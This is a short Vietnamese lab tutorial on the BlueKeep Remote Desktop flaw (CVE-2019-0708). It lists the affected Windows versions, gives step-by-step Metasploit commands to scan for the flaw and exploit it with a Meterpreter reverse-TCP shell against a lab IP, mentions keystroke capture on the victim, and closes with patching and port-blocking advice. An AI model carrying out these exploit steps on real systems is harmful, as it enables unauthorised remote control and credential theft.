1. Giới thiệu:
BlueKeep là một lỗ hổng thực thi mã từ
xa trong Dịch vụ kết nối Máy tính từ xa của Windows (Windows Remote Desktop
Services). Lỗ hổng BlueKeep có định danh CVE-2019-0708, được đánh giá mức độ
nghiêm trọng. Vào ngày 14/05/2019 Microsoft
đã phát hành bản cập nhật cho lỗ hổng có mã CVE-2019-0708 tồn tại trong dịch vụ
Remote Desktop. Đáng lo
ngại, tin tặc có thể sử dụng lỗ hổng như một phương thức để phát tán mã độc đào
tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, mà không cần sự tương tác
của người dùng.
2. Các phiên bản ảnh hưởng:
-
Windows
2003
-
Windows
XP
-
Windows
7
-
Windows
Server 2008
-
Windows
Server 2008 R2
3. Cách kiểm tra và thực nghiệm
Tool sử dụng: Metasploit,
TCPView
Cài đặt và cập nhập metasploit mới nhất:
apt update; apt install metasploit-framework
Kiểm tra
Hình 1 –
Scan lỗ hổng bluekeep
Step 1: Khởi động
msfconsole
Step 2: search
bluekeep
Step 3: use
auxiliary/scanner/rdp/cve_2019_0708_bluekeep
Step 4: set rhosts
192.168.8.129
Step 5: run
Thực nghiệm
Hình 2 –
Thêm option cần thiết cho payload
Step 1: use
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Step 2: set payload
windows/x64/meterpreter/reverse_tcp
Step 3: set lhost
192.168.8.128
Step 4: set rhosts
192.168.8.129
Step 5: set target 1
Step 6: set groomsize
50
Step 7: exploit
Hình 3 – Kết
quả khai thác
Hình 4 – Kịch
bản khai thác keyscan trên máy nạn nhân
4.
Cách khắc phục
-
Sử
dụng tool TCPView kiểm tra kết nối, phát hiện process có kết nối lạ đến, kill
tiến trình đó.
-
Tạm
thời chặn port 3389, nếu sử dụng thì giới hạn ip vào port.
-
Cập
nhập bản vá tương ứng với hệ điều hành
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708